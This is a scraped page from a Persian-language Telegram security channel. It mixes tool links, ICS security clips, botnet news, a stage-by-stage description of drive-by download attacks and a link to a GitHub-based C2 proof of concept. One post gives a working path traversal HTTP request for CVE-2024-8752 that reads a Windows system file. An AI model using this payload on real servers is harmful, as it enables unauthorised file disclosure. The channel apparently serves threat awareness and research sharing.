P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
netdis web disassembler

https://netdis.org/

@pfksecurity
Media is too big
VIEW IN TELEGRAM
مقدمه ای بر Windows Performance Analyzer

@pfksecurity
توییت اسنودن در‌ رابطه با حادثه امروز لبنان
@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
من Beckhoff CX9001 ICS شما را با ابزارهای منبع باز در 68 ثانیه امن می کنم!

#ICS
@PfkSecurity
علاقه مند به بحث Ics/scada Security هستید؟
Anonymous Poll
86%
بله
14%
خیر
Reversing VMCrack


مستندسازی فرآیند مهندسی معکوس و غیر مجازی کردن یک باینری محافظت شده با مبهم سازی مجازی سازی و تکنیک های مختلف anti-debugging

https://blog.deobfuscate.io/reversing-vmcrack

@PfkSecurity
CVE-2024-8752

GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1

#exploit #poc
@PfkSecurity
💡واژه نامه کلاهبردار تلگرام

یادم نیست چطور با این مورد برخورد کردم اما چند وقت پیش آن را ذخیره کردم. 278 اصطلاح مختلف مربوط به کلاهبرداری. اعتبار در پایین برگه آنها است.

https://docs.google.com/spreadsheets/d/1-ICFqnnm0DryaVfCdp7NwleGG03pJorT63bEMPBmji8/htmlview#

@PfkSecurity
💡How A Drive By Download Works

در مرحله اول: مهاجم از یک وب سایت موجود و قانونی سوء استفاده یا اکسپلویت می کند.

در مرحله دوم : کاربر به وب سایت در معرض خطر مرور می کند.

در مرحله سوم : اکسپلویت جاوا مخفی، پیلود مخرب را دانلود می کند و آن را بی صدا اجرا می کند.

در مرحله چهارم : تروجان دسترسی از راه دور نصب شده است، reverse shell  را به مهاجم باز می کند .

در مرحله پنجم : مهاجم کنترل از راه دور را بر روی کامپیوتر کاربر به دست می آورد ‌.

در مرحله ششم :مهاجم از گذرواژه‌های جمع‌آوری‌شده برای انتقال داده‌های جانبی و مرحله‌ای در وب‌سایت شرکت در دسترس خارجی استفاده می‌کند .

در مرحله هفتم :مهاجم داده های مرحله بندی شده را از وب سایت شرکت قربانی بازیابی می کند.

@PfkSecurity
خبر جان باختن ۵۱ کارگر معدن طبس قلب همه را به درد آورد. 

به خانواده‌های عزیزانی که عزیزانشان را در این حادثه از دست دادند، تسلیت می‌گوییم. امیدواریم روزی شاهد باشیم که چنین اتفاقات تلخی تکرار نشود.
دستگاه‌های SOHO و IoT، از جمله مودم‌ها، روترها، دوربین‌های IP، دستگاه‌های NVR/DVR و دستگاه‌های NAS آلوده به بات‌نت Raptor Train

250k+ دستگاه از فروشندگان بسیاری (Mikrotik، Zyxel، Hikvision و غیره)

https://blog.lumen.com/derailing-the-raptor-train/

@PfkSecurity
Media is too big
VIEW IN TELEGRAM
Windows Malware using Github as C2 (Command and Control)

GithubC2

اثبات ساده کد مفهومی در سی شارپ برای ایجاد یک برنامه ساده ویندوزی که از مخزن Github و APIها به عنوان یک Command and Control channel (C2) استفاده می کند.

https://github.com/gemini-security/GithubC2

@PfkSecurity